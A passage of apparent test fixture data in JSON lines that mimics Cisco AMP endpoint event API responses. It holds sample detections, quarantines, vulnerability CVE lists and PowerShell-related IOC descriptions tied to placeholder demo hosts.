IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610603346,"start_date":"2021-01-14T05:49:06+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"},"parent":{"disposition":"Clean","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515350231459808800,"timestamp":1610584664,"timestamp_nanoseconds":0,"date":"2021-01-14T00:37:44+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610584030,"timestamp_nanoseconds":579890366,"date":"2021-01-14T00:27:10+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583671182384431000,"timestamp":1610582528,"timestamp_nanoseconds":614000000,"date":"2021-01-14T00:02:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":695000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":691000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":684000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":682000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960","sha1":"5faebef3bb880489195e80e6656ccf442ff7123b","md5":"84b6f7be5370c1998886214790c6892b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15152998206589,"timestamp":1610534253,"timestamp_nanoseconds":0,"date":"2021-01-13T10:37:33+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610534253,"start_date":"2021-01-13T10:37:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"WINWORD.EXE","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2013","cve":"CVE-2014-0260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260"},{"cve":"CVE-2014-1761","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761"},{"cve":"CVE-2014-6357","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357"},{"cve":"CVE-2015-0085","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085"},{"cve":"CVE-2015-0086","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086"},{"cve":"CVE-2015-1641","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641"},{"cve":"CVE-2015-1650","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650"},{"cve":"CVE-2015-1682","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682"},{"cve":"CVE-2015-2379","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379"},{"cve":"CVE-2015-2380","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380"},{"cve":"CVE-2015-2424","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424"},{"cve":"CVE-2016-0127","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127"},{"cve":"CVE-2016-7193","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193"},{"cve":"CVE-2017-0292","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292"},{"cve":"CVE-2017-11826","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508159571352093000,"timestamp":1610533415,"timestamp_nanoseconds":349000000,"date":"2021-01-13T10:23:35+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298360312529000,"timestamp":1610532793,"timestamp_nanoseconds":312509000,"date":"2021-01-13T10:13:13+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610532793,"start_date":"2021-01-13T10:13:13+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298355162029000,"timestamp":1610532788,"timestamp_nanoseconds":162019000,"date":"2021-01-13T10:13:08+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610532788,"start_date":"2021-01-13T10:13:08+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508153524038140000,"timestamp":1610532007,"timestamp_nanoseconds":606000000,"date":"2021-01-13T10:00:07+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6508153524038139905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521062325693667300,"timestamp":1610447087,"timestamp_nanoseconds":693632000,"date":"2021-01-12T10:24:47+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610447087,"start_date":"2021-01-12T10:24:47+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6532910514396201000,"timestamp":1610446522,"timestamp_nanoseconds":872000000,"date":"2021-01-12T10:15:22+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:Malwaregen.21do.1201","detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"OLD.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9","sha1":"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c","md5":"cfdd16225e67471f5ef54cab9b3a5558"},"parent":{"process_id":2632,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef","sha1":"84123a3decdaa217e3588a1de59fe6cee1998004","md5":"38ae1b3c38faef56fe4907922f0385ba"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.F2863A.211556.in02","detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"twhy.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117","sha1":"7d9518ea3f98d037745352b23861fab05d3777dc","md5":"c624d61b8f076c3ef05f74eeb96c8954"},"parent":{"process_id":4868,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132516139000,"timestamp":1608874241,"timestamp_nanoseconds":516130000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132474871000,"timestamp":1608874241,"timestamp_nanoseconds":474861000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384389977,"timestamp":1608872547,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:27+00:00","event_type":"Vulnerable Application 